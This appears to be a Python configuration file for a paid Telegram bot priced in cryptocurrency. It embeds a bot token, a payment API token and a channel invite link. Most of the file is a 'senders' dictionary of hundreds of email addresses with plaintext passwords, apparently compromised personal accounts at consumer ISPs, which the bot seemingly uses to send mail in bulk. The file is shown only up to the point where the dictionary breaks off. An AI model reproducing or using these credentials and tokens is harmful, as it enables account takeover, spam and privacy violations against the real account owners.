CHANNEL_ID = -1002768054672

CHANNELS = {
    -1002768054672: "https://t.me/+2AyzU2pm8y00NDc6"
}

private_channel_ids = {3117077473, 3259505746} 
 
VIP_PRICE = {
    "USDT": 0.3,
    "TON": 1.5,
    "BTC": 0.0001,
    "ETH": 0.001,
    "BNB": 0.01,
    "LTC": 0.02,
    "DOGE": 50,
    "TRX": 10,
    "NOT": 2,
}

CURRENCY_PRICES = {
    "1_day": {
        "TON": 0.5,
        "BTC": 0.0001,
        "ETH": 0.001,
        "USDT": 2,
        "BNB": 0.01,
        "LTC": 0.02,
        "DOGE": 50,
        "TRX": 10,
        "NOT": 2,
    },
    "30_days": {
        "TON": 2.5,
        "BTC": 0.001,
        "ETH": 0.01,
        "USDT": 8.5,
        "BNB": 0.1,
        "LTC": 0.1,
        "DOGE": 200,
        "TRX": 30,
        "NOT": 10,
    },
    "1_year": {
        "TON": 3.0,
        "BTC": 0.005,
        "ETH": 0.05,
        "USDT": 10.10,
        "BNB": 0.5,
        "LTC": 0.5,
        "DOGE": 500,
        "TRX": 100,
        "NOT": 50,
    },
}

SESSION_DIR = 'Session'
bot_token = '8415450243:AAHjqFuqbCoyEfmyM4dnCA41ofXlcTS2s34'   
admin_chat_ids = ['8299768278']
CRYPTO_PAY_TOKEN = '485913:AAthES9C4Gwk64pGwNwjAHRHteAHD7HKCDm'

senders = {
    "dlatt6677@gmail.com": "usun ruef otzx zcrh",
    "dlatt7055@gmail.com": "tpzd nxle odaw uqwf",
    "dlyabravla655@gmail.com": "kprn ihvr bgia vdys",
    " hauschild@mchsi.com": "roadking",
    "hieland@mchsi.com": "Gunner45*",
    "hauschild@mchsi.com": "roadking",
    "hieland@mchsi.com": "Gunner45*",
    "hooper@mchsi.com": "coughlin13",
    "kathyncrew@mchsi.com": "Kak2288*",
    "angela.smith64@mchsi.com": "Hillary#1",
    "g.racine@mchsi.com": "Chris85!",
    "lestat4-20@mchsi.com": "Lest@t420",
    "a.makely@mchsi.com": "Bellanino00!",
    "clabo@mchsi.com": "Jadonc4!!",
    "cthomas@mchsi.com": "1ubetya1",
    "erivas@mchsi.com": "Moren@1974",
    "illini4ever@mchsi.com": "Cr@btree63",
    "t.maloy@mchsi.com": "Point@123",
    "royalpriest@mchsi.com": "Hazrai@1",
    "phelps85@mchsi.com": "Teller00$",
    "bjcarico@mchsi.com": "Kamden01!",
    "terinares@mchsi.com": "Tessa@61",
    "r.cathcart@mchsi.com": "Water@5115",
    "k.schilling@mchsi.com": "History@1066",
    "lopfam@mchsi.com": "Macaman#7",
    "rruddle@mchsi.com": "Jacktim#1",
    "lindalinbarr@mchsi.com": "Lin#1lins",
    "william.petersen@mchsi.com": "K@pono97",
    "r.kooker@mchsi.com": "Suntan17!",
    "test.sbinfowaves@gmail.com": " rpgbuawakufthsgm",
    "adeokinolamilekan8@gmail.com": "wbbxxmnvlbbpdlcj",
    "demzyukonta@gmail.com": "qjsitmlyrvvrxgnm",
    "deveshchaudhary757@gmail.com": "zkyeaybczzwhgcef",
    "kaledmostafa1983@gmail.com": "znlgvasafkbcched",
    "pm.zogbi@uol.com.br": "Nortense2020nq",
    "hauschild@mchsi.com": "roadking",
    "hieland@mchsi.com": "Gunner45*",
    "hooper@mchsi.com": "coughlin13",
    "terrace88@mchsi.com": "lakehome88",
    "tammy.jordan@mchsi.com": "Babydolls3!",
    "caanru@mchsi.com": "rascal16",
    "t.terrones@mchsi.com": "Fj@605wC5804",
    "kathyncrew@mchsi.com": "Kak2288*",
    "angela.smith64@mchsi.com": "Hillary#1",
    "g.racine@mchsi.com": "Chris85!",
    "lestat4-20@mchsi.com": "Lest@t420",
    "a.makely@mchsi.com": "Bellanino00!",
    "clabo@mchsi.com": "Jadonc4!!",
    "cthomas@mchsi.com": "1ubetya1",
    "erivas@mchsi.com": "Moren@1974",
    "illini4ever@mchsi.com": "Cr@btree63",
    "t.maloy@mchsi.com": "Point@123",
    "royalpriest@mchsi.com": "Hazrai@1",
    "phelps85@mchsi.com": "Teller00$",
    "bjcarico@mchsi.com": "Kamden01!",
    "terinares@mchsi.com": "Tessa@61",
    "r.cathcart@mchsi.com": "Water@5115",
    "beenders@mchsi.com": "Shari#123",
    "wiggy176@mchsi.com": "Tucker@01",
    "jborkowski@mchsi.com": "Ajta@2582",
    "k.schilling@mchsi.com": "History@1066",
    "lopfam@mchsi.com": "Macaman#7",
    "rruddle@mchsi.com": "Jacktim#1",
    "lindalinbarr@mchsi.com": "Lin#1lins",
    "william.petersen@mchsi.com": "K@pono97",
    "r.kooker@mchsi.com": "Suntan17!",
    "mkmettert@mchsi.com": "Loverboy16#",
    "keith372159@mchsi.com": "Sask3835$",
    "thereem@5x2.de": "Polar0412",
    "gjhux@dcsi.net.au": "gav23hux",
    "shanegoneill@aussiebroadband.com.au": "woollyone15",
    "leongvincent@singnet.com.sg": "Sdz6500A",
    "rbzpghmtpw@autorambler.ru": "7BuPrGgvab",
    "laerteautomoveis@uol.com.br": "Jairo2020@",
    "andrew.johnson50@wibox.fr": "rewstreet4",
    "assumpto@fertility.com.br": "Camila02@",
    "luiza_conejero@uol.com.br": "Der180303#",
    "carsten.kolhosser@osnanet.de": "olivetti",
    "johannes.kreienbrink@osnanet.de": "hannes55",
    "anke.temme@osnanet.de": "erdbeere",
    "dlatt7055@gmail.com": "tpzdnxleodawuqwf",
    "adeokinolamilekan8@gmail.com": "wbbxxmnvlbbpdlcj",
'deveshchaudhary757@gmail.com':'zkyeaybczzwhgcef',
'adeokinolamilekan8@gmail.com':'wbbxxmnvlbbpdlcj',
'demzyukonta@gmail.com':'qjsitmlyrvvrxgnm',
'mkmettert@mchsi.com':'Loverboy16#',
'tammy.jordan@mchsi.com':'Babydolls3!',
'josebeekers@ziggo.nl':'sojojo.1234',
'steffen.moormann@osnanet.de':'meikegeil1',
'matija.ljevarbukvic1@vip.hr':'Matija3004',
'barbara.kurschat@osnanet.de':'irland',
'bjeglic@vip.hr':'0404977',
'plavec@lds.net.ua':'gpi237sd',
'deineko@lds.net.ua':'hzr116vb',
'g.racine@mchsi.com':'Chris85!',
'joern-herzog@osnanet.de':'portocala40',
'yessicar@montevideo.com.uy':'Daniel1212',
'silfa@montevideo.com.uy':'emi2306',
'sandra.neugebauer@osnanet.de':'norderney',
'ulrichfuisting@osnanet.de':'uli311272',
'lauraniki@montevideo.com.uy':'rinconada1',
'etasang@lds.net.ua':'naz887ss',
'andre.roloff@osnanet.de':'AndreR',
'gerardol@montevideo.com.uy':'acvg25987',
'godwyn@montevideo.com.uy':'Spectrum',
'schloesser.badiburg@osnanet.de':'Karlshafen',
'n_o_d@lds.net.ua':'zde523ea',
'outtouch@montevideo.com.uy':'Aem7412',
'bernardobreedveld@ziggo.nl':'Cintakue1990!',
'borisvrielink@ziggo.nl':'kb3ghuyn',
'bredordt@ziggo.nl':'moerdijk',
'a_smeenk@ziggo.nl':'csrules88',
'gjrodher@montevideo.com.uy':'051182',
'serdg@lds.net.ua':'bsd270fv',
'leyi_auyeung@ziggo.nl':'Een234Vijf',
'szshtc@ziggo.nl':'bassen11',
'whpas@ziggo.nl':'welkom01',
'genya55@lds.net.ua':'tgl686vt',
'rhcardol@ziggo.nl':'Cardol67!',
'anna.rustenhoven@ziggo.nl':'Lucaanna123',
'cybernetic@ziggo.nl':'Enigma51',
'wibouwhuis@ziggo.nl':'wi040956',
'j.groeneveld1@ziggo.nl':'welkom01',
'gabigabi@montevideo.com.uy':'cotonete',
'j.dewinter@ziggo.nl':'220551',
'r.rubingh@ziggo.nl':'welkom01',
'rossidel@montevideo.com.uy':'2994944',
'ptang@ziggo.nl':'welkom01',
'tonleeuwenhage@ziggo.nl':'gonnie1234',
'skylger@ziggo.nl':'Karper7428011',
'michael_diependaal@ziggo.nl':'remie988',
'stukadoorvanson@ziggo.nl':'zielus1234',
'gruter@ziggo.nl':'m19031940',
'hiddesiegerist@ziggo.nl':'Maandag01',
'p.h.l.muermans@ziggo.nl':'R03rmond!',
'francien14@ziggo.nl':'november5',
'jeanpaulvincenten@ziggo.nl':'apekop88',
'j-smedema@ziggo.nl':'gigantje35',
'posthouwer@ziggo.nl':'welkom01',
'biksi@lds.net.ua':'jth367ex',
'm.wiegerinck@ziggo.nl':'2000Mart',
'theijda@ziggo.nl':'12th34th',
'rick1984@ziggo.nl':'Rick1984',
'teunoffermans@ziggo.nl':'teun2002',
'gflippets@ziggo.nl':'6gerrie6',
'ja.helen@ziggo.nl':'DaphneOnyx_13',
'arieonlein@ziggo.nl':'marjolein',
'lastsupernova@ziggo.nl':'Yesterday-4',
'daan.peschier@ziggo.nl':'Bromsnor387',
'mirandamill@ziggo.nl':'Daan1101.',
'emmybakker@ziggo.nl':'Warrior1',
'markenmichelle@ziggo.nl':'Diesel01',
'k.korving@ziggo.nl':'welkom',
'b.collette@ziggo.nl':'birgitta54',
'bertuslg@ziggo.nl':'ballerina',
'vbj.kieftenbeld@ziggo.nl':'welkom01',
'cesterik@ziggo.nl':'Chantal1',
'fililoo@ziggo.nl':'Lhpmf702',
'walter.lawerman@ziggo.nl':'welkom01',
'j.j.drunen@ziggo.nl':'welkom123',
'eric.deman@ziggo.nl':'Vuurwerk1',
'fam.wimmers@ziggo.nl':'Julian1998',
'mwt.spaans@ziggo.nl':'Creamer1',
'tgveenstra@ziggo.nl':'welkom01',
'andre.hordijk@ziggo.nl':'Andre1971',
'evertsmid@ziggo.nl':'Bessie02',
'vanrooyen1@ziggo.nl':'welkom12',
'wilbertrood@ziggo.nl':'wr160978',
'body_elekta@lds.net.ua':'pul128lo',
'carien.pluk@ziggo.nl':'carien1957',
'trueman@lds.net.ua':'rtn512ib',
'anna7@lds.net.ua':'gfdkjdbx1978',
'aidanhoekstra@ziggo.nl':'aidan2210',
'isdatwat@ziggo.nl':'arie0107',
'fam.verstraten@ziggo.nl':'REMAWI98',
'lisa.maas@ziggo.nl':'Dolfijn2001!',
'jimmybarge@ziggo.nl':'hoeren',
'annemievdkerke@ziggo.nl':'welkom01',
'etienne.h@ziggo.nl':'etienne',
'holden6@ziggo.nl':'holden',
'reiniervanrumpt@ziggo.nl':'rumpie75',
'wvanree@ziggo.nl':'giovanni',
'm.vanlaarhoven@ziggo.nl':'welkom01',
'sopamena@ziggo.nl':'cocacola',
'teie.bleeker@ziggo.nl':'Teie-1947',
'j.vanveen@ziggo.nl':'welkom.01',
'sylvester.engelen@ziggo.nl':'Beertje21!',
'to.marc@ziggo.nl':'Batman666',
'elhenk@ziggo.nl':'7657CMzy',
'wim_xiomara@ziggo.nl':'Alejandro7474',
'michaelvandewiel@ziggo.nl':'4qu4rium',
'dekoningf@ziggo.nl':'Annie2501.',
'rickspijkers@ziggo.nl':'ditraadjenooit',
'pp.stalman@ziggo.nl':'Licombul8',
'sophietwaalfhoven@ziggo.nl':'Sophie12hoven',
'hdijk66@ziggo.nl':'previcur',
'ashot@lds.net.ua':'dfl957nd',
'apkuipers@ziggo.nl':'welkom01',
'jolanda-reinaldo@ziggo.nl':'Hardcore2010',
'p.immerzeel@ziggo.nl':'welkom01',
'j.harders@ziggo.nl':'jh1976sb',
'hendrik_kruger@ziggo.nl':'scheveningen',
'ingriddohmen@ziggo.nl':'Aurelius23!',
'f.h.sterkens@ziggo.nl':'welkom01',
'norbert.wueller@osnanet.de':'wutzia05',
'waltherentamara@ziggo.nl':'welkom1',
'tinovanderzwan@ziggo.nl':'nipper2003',
'jan.brigitte@ziggo.nl':'martijn98',
'meilof.feiken@ziggo.nl':'Leomar0127',
'eric.susanne@ziggo.nl':'vrydag13',
'peteranderson@ziggo.nl':'123itsme',
'stier75@ziggo.nl':'wolff21',
'joopmassar@ziggo.nl':'Adriana1962',
'14091981@lds.net.ua':'gzq964hh',
'hjaoomkens@ziggo.nl':'roelof13',
'jolanda1983@ziggo.nl':'jolanda1983',
'hannah.mey@osnanet.de':'Pepper221012',
'jacquelinemahulette@ziggo.nl':'24Polleke98',
'sarnadas@ziggo.nl':'grapeqni',
'bak_wesley@ziggo.nl':'Paardenvijg01',
'f.vanden.hoek@ziggo.nl':'Ricdan01',
'paulamvv76@ziggo.nl':'Xavienne2010',
'af.haan@ziggo.nl':'Alfred1977!',
'r.dingemans@ziggo.nl':'aapje.123',
'erikpoppen@ziggo.nl':'W1205198wi!',
'sandraaline13@ziggo.nl':'sandra1974',
'a.von.bogen@osnanet.de':'werter',
'pschouwenaars@ziggo.nl':'Pietje-02',
'kaijatromp@ziggo.nl':'Kaijavvh11',
'schoonus1@ziggo.nl':'continental',
'franskadmaerubun@ziggo.nl':'Solectron001',
'brigitte283@ziggo.nl':'luna0304',
'wassily@ziggo.nl':'Damon3108',
'danya6@lds.net.ua':'lwe274er',
'rietwieman@ziggo.nl':'welkom01',
'jbulham@ziggo.nl':'mitchell14',
'riancoppens@ziggo.nl':'Amber0210',
'dannyfrancis@ziggo.nl':'Dwr_100873',
'tim.eerhart@ziggo.nl':'tim1981',
'tristandijkstra@ziggo.nl':'missyou4ever',
'jokebrouwer@ziggo.nl':'Incas1234',
'k.heemels@ziggo.nl':'Jorik27!',
'annekemussen@ziggo.nl':'klopklop123',
'dewillem@ziggo.nl':'Rooijakkers1',
'robertkusters@ziggo.nl':'Bevohc1983',
'gerardglazenborg@ziggo.nl':'Tygo2402',
'a_ahmed@ziggo.nl':'Loos1982.',
'mazahaka007@lds.net.ua':'rwf352qp',
'hans-juergen.schnabel@osnanet.de':'schnabel',
'kostiuchenko@lds.net.ua':'ftz289ux',
'skubak@lds.net.ua':'mkp064rv',
'marijke.verbeek@ziggo.nl':'Welkom01',
'svantertergouw@ziggo.nl':'Maxmilano1234',
'hbokma@ziggo.nl':'welkom',
'erjema@ziggo.nl':'erjema61',
'wolfftheo@ziggo.nl':'15051966',
'grietjeboer@ziggo.nl':'gr62boaa',
'wvdstar@ziggo.nl':'welkom1',
'dilmen@lds.net.ua':'nya101rh',
'ingo.gerkensmeier1@osnanet.de':'jana1996',
'rob.petersen@ziggo.nl':'david777',
'tvanbeers@ziggo.nl':'welkom01',
'parelhoen63@ziggo.nl':'bartsmit',
'oscarberghege@ziggo.nl':'Jente2504',
'martenvos@ziggo.nl':'Radio794',
'maureenwenneker@ziggo.nl':'30071973',
'karel.groeneweg@ziggo.nl':'150665',
'avdwijst@ziggo.nl':'Riaantoon13',
'niver@ziggo.nl':'niver1',
'm.osseforth@ziggo.nl':'osseforth1',
'k.lute@ziggo.nl':'luteklaa01',
'walter.eline@ziggo.nl':'eline2000',
'anne.rozema@ziggo.nl':'l33trainb0w',
'margaenwim@ziggo.nl':'wim1510',
'aai2014@lds.net.ua':'uef138bb',
'peter_tuil@ziggo.nl':'passat130',
'mphdirks@ziggo.nl':'Hxcd8f33',
'r.kroep@ziggo.nl':'Kezman77',
'jasmin.wiemeyer@osnanet.de':'Torwart1',
'p.a.douma@ziggo.nl':'Nw122hbedum!',
'jillis@ziggo.nl':'m887awMQ',
'ruthgerynette@ziggo.nl':'Reghter01',
'e.r.vandenbrink@ziggo.nl':'93145Erv',
'mcrijnen@ziggo.nl':'Maikel1973',
'henny.krijnen@ziggo.nl':'joheeren',
'dacor@ziggo.nl':'11Verd!!',
'eveline1985@ziggo.nl':'Eveline1985',
'b.drijver@ziggo.nl':'welkom01',
'r.brekelmans@ziggo.nl':'welkom01',
'daniel.friedrichs@ziggo.nl':'daniel86',
'van-xandine8@ziggo.nl':'dewitte',
'pjvanoene2@ziggo.nl':'Esculaap1',
'kocak11@ziggo.nl':'Coskunum1',
'benelux@osnanet.de':'123456',
'hw.dejonge@ziggo.nl':'wesley2001',
'ammel@ziggo.nl':'n8wacht',
'ankestevens@ziggo.nl':'a22021991',
'ingie@ziggo.nl':'Bakker.74',
'tom.kleizen@ziggo.nl':'7559ph38',
'j.valstar@ziggo.nl':'Sloper.1',
'albertvanderschans@ziggo.nl':'3-Augustus',
'arie.meyvogel@ziggo.nl':'1200slmk2',
'pvkimmenade@ziggo.nl':'Jenkens1508',
'mwvanvliet@ziggo.nl':'Raylanie01',
'richarddijkstra@ziggo.nl':'ajax2005',
'p.roode@ziggo.nl':'bramjelle',
'aysepauptit@ziggo.nl':'princess',
'p.vminderhout@ziggo.nl':'maRley12',
'kamikadze@lds.net.ua':'qazsedc1478',
'jhvalke@ziggo.nl':'welkom01',
'killerknol@ziggo.nl':'190680',
'janvanoirschot@ziggo.nl':'Laser_1988',
'h.alfermann@osnanet.de':'gesmold',
'love_janesley@ziggo.nl':'72437243',
'marijkeverhoeff@ziggo.nl':'Kaatje19',
'gjh.van.dijk@ziggo.nl':'henk4460',
'heike.brandewiede@osnanet.de':'Blumengarten',
'vleklin@ziggo.nl':'milmars3',
'demijara@ziggo.nl':'123456fw',
'e.r.v.bokhorst@ziggo.nl':'e5B2g6M2!',
'gerardvandijk49@ziggo.nl':'ineke02',
'wesleyzweers@ziggo.nl':'Daley123',
'shev4521@lds.net.ua':'plj367mh',
'wielcaris@ziggo.nl':'210158',
'tonkaanders@ziggo.nl':'Golden10!',
'janfrings@ziggo.nl':'welkom01',
'dirk.groen@ziggo.nl':'27dirk03',
'h.steehouwer@ziggo.nl':'shoemf22',
'ltvandoorn@ziggo.nl':'5Kleinkinderen',
'kylorv@ziggo.nl':'868686',
'sabine_lust@ziggo.nl':'ceesafra',
'jhpvandijk@ziggo.nl':'02111944',
'paullamboo@ziggo.nl':'fietsbel1',
'b-teunissen@ziggo.nl':'2810teun',
'groningen4@ziggo.nl':'welkom01',
'nicolemerks@ziggo.nl':'caenen01',
'leilajanzen@ziggo.nl':'rover620',
'jeremy.c@ziggo.nl':'Jeremy12',
'tonnyvandijk@ziggo.nl':'Tessje1962!',
'kp.meinesz@ziggo.nl':'baras123',
'rikkoudijs@ziggo.nl':'Koudijs1',
'zayceva@lds.net.ua':'qjf694bi',
'pim_valkenburg@ziggo.nl':'beeldscherm',
'pascaljurien@ziggo.nl':'Mirjam-1969',
'roel.bos@ziggo.nl':'Siboney1!',
'joelgeres@ziggo.nl':'Allaha12',
'hommema@ziggo.nl':'welkom01',
'janec@ziggo.nl':'tb303909',
'rkuitems@ziggo.nl':'rick2000',
'plinie@ziggo.nl':'Hansol11',
'stefan.milakovic@osnanet.de':'Stefan2002',
'naturstein-franzen@osnanet.de':'sarras',
'arjandemooij@ziggo.nl':'hdmo0339',
'd.stein@osnanet.de':'Nuufce',
'jurriendejong@ziggo.nl':'cecilejur',
'jerro@ziggo.nl':'Vanleeuwen1!',
'camielschouten@ziggo.nl':'Legmeervogels2109',
'hajvz@ziggo.nl':'Heanja-1',
'peggyadvocaat@ziggo.nl':'Rocile7879!',
'veldman.martijn@ziggo.nl':'k0k0sn00t',
'ymezijlstra@ziggo.nl':'welkom123',
'cdbruin@ziggo.nl':'cas4stijn',
'spam.box@ziggo.nl':'p6tTTNdg',
'joost.bockwinkel@ziggo.nl':'moeder79',
'kjdrenth@ziggo.nl':'welkom123',
'robin.sandmann@osnanet.de':'rabbit',
'fraluca@ziggo.nl':'sarrabus',
'nellie27@ziggo.nl':'Duivel.1',
'jjlpostma@ziggo.nl':'john01',
'legolas@lds.net.ua':'jeffhardy',
'kenja@lds.net.ua':'skv792ni',
'menno.nieuwpoort@ziggo.nl':'kimjade',
'tppelzer@ziggo.nl':'saparua55',
'wpietersma@ziggo.nl':'gd131052',
'unieke@osnanet.de':'Kaliber44',
'djwouter@ziggo.nl':'DirkMarinus1!',
'johanlamme@ziggo.nl':'Jll1994114515!!!',
'a.leon@ziggo.nl':'welkom123',
'richardsmit1210@ziggo.nl':'password',
'e_m.geerts@ziggo.nl':'welkom01',
'lucasnl@ziggo.nl':'Luxas237',
'c.wijnings@ziggo.nl':'Liefje-26',
'jfievet@ziggo.nl':'welkom01',
'pmjvierkant@ziggo.nl':'Hermans1',
'sokol3@lds.net.ua':'dye340jb',
'joep.vantoor@ziggo.nl':'jopsophie',
'c.scheepmaker@ziggo.nl':'schpmkr',
'brouwerb@ziggo.nl':'welkom01',
'tevdokimova@lds.net.ua':'mdp671kl',
'cengizalkan60@ziggo.nl':'Cimbom95',
'kotenok5@lds.net.ua':'ehs270aw',
'nielsvanelzakker@ziggo.nl':'niels123',
'annaice@lds.net.ua':'iro216sd',
'jannekevanspanje@ziggo.nl':'janneke1',
'dylaylaveenboer@ziggo.nl':'Schimmel08',
'cwdebie@ziggo.nl':'Zigg0Sk1rt',
'jokejm11@ziggo.nl':'Kanaal13',
'pelbertse@ziggo.nl':'pelbertse1972',
'koopmans.rw@ziggo.nl':'Q57TbPgA',
'gerardvandenboogaard@ziggo.nl':'Gerard_43',
'filip84@lds.net.ua':'gfq021gv',
'helga.von.schaewen@osnanet.de':'schaewchen',
'joseroskam@ziggo.nl':'Marloes59',
'michelle_deboer@ziggo.nl':'Michelle1',
'piet.van.schaik@ziggo.nl':'oldcamp1',
'melindathalen@ziggo.nl':'Mellie28',
'esjur1@ziggo.nl':'Mercedes2g12',
'joni91@ziggo.nl':'welkom01',
'smisol@ziggo.nl':'Greetje34&',
'arndt.tschoeke@osnanet.de':'arndt1963',
'vanraak.groenen@ziggo.nl':'Henriette1',
'ja.bontenbal@ziggo.nl':'welkom1',
'ottoline@ziggo.nl':'christiana',
'de-groentjes@ziggo.nl':'ferran',
'johanhaakman@ziggo.nl':'Jackij11',
'a.heetebrij@ziggo.nl':'welkom01',
'jeroen.flink@ziggo.nl':'Qwerty01',
'ingo-wiesner@osnanet.de':'hundekorb',
'patrickenmartine@ziggo.nl':'Hupseflups1!',
'jackenedithvergauwen@ziggo.nl':'Vergauwen01',
'ottilie@osnanet.de':'ottilie',
'jm.stevens@ziggo.nl':'welkom01',
'pipodwangbuis@ziggo.nl':'EvaBraun',
'angelaroelfsema@ziggo.nl':'20022011',
'karien.sanders@ziggo.nl':'Birdie12',
'c-berndsen@ziggo.nl':'Justin!94',
'guisthinio@ziggo.nl':'Wairesa81',
'monarx@lds.net.ua':'monarx221091',
'joerithemen@ziggo.nl':'Jt25091993!',
'c.kengen@ziggo.nl':'vesta1985',
'p.hooimeijer@ziggo.nl':'ph25344',
'loyal@lds.net.ua':'loyal280976',
'terpoorten@ziggo.nl':'fietstas',
'birgitpostma@ziggo.nl':'Romeinen-1',
'ulrike.michel-hensel@osnanet.de':'schimmel',
'duponchel@ziggo.nl':'Chris1952',
'erna.doornbos@ziggo.nl':'Erna1955!',
'a_scheffer@ziggo.nl':'welkom01',
'mjageilenkirchen@ziggo.nl':'welkom01',
'esther.verlaan@ziggo.nl':'halloalle18',
'kimmetjehier@ziggo.nl':'wachtwoord1',
'ron.smeijers@ziggo.nl':'bandit1965',
'wozniak@ziggo.nl':'123456',
'hennykooijman@ziggo.nl':'Annemieke1988',
'wbasaglia@ziggo.nl':'Felipe01',
'a.verhof@ziggo.nl':'Hotsails-1963',
'peterberndes@ziggo.nl':'Bernd098',
'gabyflath@ziggo.nl':'Gamatati35218',
'luukcroezen@ziggo.nl':'tomtom',
'dannybusscher@ziggo.nl':'0641181699',
'bart.mooy@ziggo.nl':'vak407',
'buhrmann@ziggo.nl':'Kerstmis8',
'quincy.daemen@ziggo.nl':'pokemon',
'estherencamille@ziggo.nl':'Escam1108!',
'wim.feiter@ziggo.nl':'1346wife',
'webcam123@ziggo.nl':'Webcam123',
'verschuur.e@ziggo.nl':'welkom01',
'renehoegen@ziggo.nl':'Hoegen01',
'jos.oudeegberink@ziggo.nl':'Welkom1!',
'tyroendylan@ziggo.nl':'jolanda2810',
'chsieverink@ziggo.nl':'loebas',
'carolapessel@ziggo.nl':'Pessel1',
'franz.brune@osnanet.de':'GJB15218',
'p.broeders@ziggo.nl':'welkom01',
'am.mathijs@ziggo.nl':'Nelson2000',
'flora.cornelissen@ziggo.nl':'flora01420',
'jwtijhuis@ziggo.nl':'welkom01',
'gw.morselt@ziggo.nl':'tukker1',
'braun82@lds.net.ua':'muw757pi',
'bosma.hp@ziggo.nl':'acces1969',
'dvankerpel@ziggo.nl':'dikkertje',
'ehdenboer@ziggo.nl':'mACEKO9E',
'samantha1991@ziggo.nl':'Samantha1991',
'kgrob@ziggo.nl':'welkom01',
'fjonkmans@ziggo.nl':'Fabian01',
'robbel01@ziggo.nl':'valerius01',
't.salden@ziggo.nl':'welkom01!',
'aloonen@ziggo.nl':'Coca-cola1',
'rvandewatering@ziggo.nl':'Oostdam8',
'cmmhvandongen@ziggo.nl':'cm452382',
'thewall@ziggo.nl':'eg08mond',
'mstrijkert@ziggo.nl':'Melkie79!',
'marvins@ziggo.nl':'Bokkelul007',
'sinned83@ziggo.nl':'gdatum83',
'jaapnotenbomer@ziggo.nl':'Jaap1958',
'evitavervaart@ziggo.nl':'pepOne5',
'm.oppedijk@ziggo.nl':'Stokvis1',
'fbosker@ziggo.nl':'bosker1962',
'andreas-wilker@osnanet.de':'lancia',
'shirali@ziggo.nl':'Shirali7',
'dkoning51@ziggo.nl':'191151dk',
'dennisvdkrogt@ziggo.nl':'apnswiss1',
'tomniewold@ziggo.nl':'10tniewold89',
'gertkornet@ziggo.nl':'IWD2sNT3',
'leoniepostelmans@ziggo.nl':'Leonie68',
'c.tersteege@ziggo.nl':'darten19',
'tonnesen@ziggo.nl':'auto5678',
'ballekom@ziggo.nl':'tarzan',
'petereemers@ziggo.nl':'werVel93',
'markbrouwersbunde@ziggo.nl':'markieb28',
'sanderagterhof@ziggo.nl':'s8erhof',
'jamiemullens@ziggo.nl':'100778',
'anka-cathy@ziggo.nl':'welkom123',
'pfalanda@ziggo.nl':'potterstraat',
'rjpotiek@ziggo.nl':'Rjp19601',
'sayeh.forouzan@ziggo.nl':'Haydari2',
'bhcvanheeswijk@ziggo.nl':'December1',
'fatimalaan16@ziggo.nl':'welkom01',
'willem1510@ziggo.nl':'lievegreta',
'deryasarihan@ziggo.nl':'scandinafie',
'kevin0409@ziggo.nl':'K3v!n2003',
'revelinoheskes@ziggo.nl':'Kymlncwu1',
'stslot@ziggo.nl':'welkom123',
'jvangool55@ziggo.nl':'Trappers-1',
'vanwamel@ziggo.nl':'ROSALIE01',
'n-dejong@ziggo.nl':'welkom123',
'janvenema@ziggo.nl':'welkom01',
'ivo.broeren@ziggo.nl':'Broeren1',
'fsloof@ziggo.nl':'31J10m15d',
'ro2005@ziggo.nl':'1Rogier1',
'rjjmclaasen@ziggo.nl':'rc31081974',
'jessewijnen@ziggo.nl':'Seoltoe3',
'hffjansen@ziggo.nl':'FDgrHUW0',
'joostwendy@ziggo.nl':'welkom01',
'jeremy10@ziggo.nl':'Jeremy10',
'jespertas@ziggo.nl':'hondenvoer',
'ankerc@ziggo.nl':'Rick1984',
'fvdveldt@ziggo.nl':'pootje',
'ron.regeer@ziggo.nl':'Wachtwoord!21',
'marianne.den.hollander@ziggo.nl':'Mar1234',
'hcpander@ziggo.nl':'09Clanhgp1!',
'patrick-blesveld@ziggo.nl':'brandweer112',
'lenyseysener@ziggo.nl':'calimero',
'mschreinders@ziggo.nl':'Lente011',
'gjbottenheft@ziggo.nl':'r83ntNB',
'john.crul@ziggo.nl':'Joker362',
'lunckshausen@osnanet.de':'Britannia',
'anitakuhn@ziggo.nl':'welkom01',
'wimrillmann@ziggo.nl':'Wmbd7545',
'fam.dallmann@osnanet.de':'97knuesel',
'capols@ziggo.nl':'Pietje-01',
'g.alles@ziggo.nl':'san040604',
'jdegroot@ziggo.nl':'welkom01',
'colec@lds.net.ua':'vda900rs',
'jtenduis@ziggo.nl':'Rakker12',
'judystuitje@ziggo.nl':'Roosje74',
'schen169@ziggo.nl':'Henk0708',
'indyotten@ziggo.nl':'Otten1971',
'w.dirksen@ziggo.nl':'bas1bas',
'kadar@ziggo.nl':'Jiyan115',
'aliceswiers@ziggo.nl':'Academy01',
'jgroeneveld@ziggo.nl':'welkom01',
'dokter.jr@ziggo.nl':'benzema1',
'w.wolting@ziggo.nl':'welkom01',
'h.harig@osnanet.de':'Juliane',
'doberman@lds.net.ua':'uyt041eg',
'sethjongerius@ziggo.nl':'H0bb3ldu',
'e.lodewijk@ziggo.nl':'welkom01',
'ronzwart@ziggo.nl':'Reinalde44',
'henkvandervlies@ziggo.nl':'welkom01',
'gerbak@ziggo.nl':'Welkom-45',
'z.sladarec@vip.hr':'zdravko007',
'marsss@ziggo.nl':'Slak1616',
'amvanbruggen@ziggo.nl':'welkom01',
'becker.bippen@osnanet.de':'mark16nils29',
'fransjs@ziggo.nl':'fransjs4175',
'd.logister@ziggo.nl':'hgptsn',
'jacobszeric@ziggo.nl':'Cg6opsplans06',
'meersan1@ziggo.nl':'Geheim01',
'paul.sadhinoch@ziggo.nl':'loper4',
'yvonnejeurissen@ziggo.nl':'debrick1',
'steph.langensiepen@osnanet.de':'borsti',
'joshua_db@ziggo.nl':'armaTrea1',
'dd.vangeffen@ziggo.nl':'welkom01',
'famverheugd@ziggo.nl':'Florian08',
'hendrik.schlueter@osnanet.de':'hs41255',
'stefan.margaroli@ziggo.nl':'Stefan2142',
'markbitter@ziggo.nl':'BAB26041972',
'marindefeijter@ziggo.nl':'Statenlaan251',
'm.danner@ziggo.nl':'Matt2104',
'dbachmann@ziggo.nl':'welkom01',
'aamdevos@ziggo.nl':'Corrie1953',
'daisy5@ziggo.nl':'leharstraat82',
'r.josbacher@ziggo.nl':'muis1234',
'efransen@ziggo.nl':'number01',
'schouteten@ziggo.nl':'Schouteten1',
't.christiansen@ziggo.nl':'Ferrari66',
'albatros@ziggo.nl':'welkom01',
'stabo123@ziggo.nl':'Lorena123',
'wolf-guntram.otto-kuestner@osnanet.de':'otto37115',
'gastonophetbroek@ziggo.nl':'Sylvia1978',
'tansusarican@ziggo.nl':'koffer123',
'davee006@ziggo.nl':'Nathalie-2017',
'm.baggerman@ziggo.nl':'baggerman',
'robijn.h@ziggo.nl':'Shad4992',
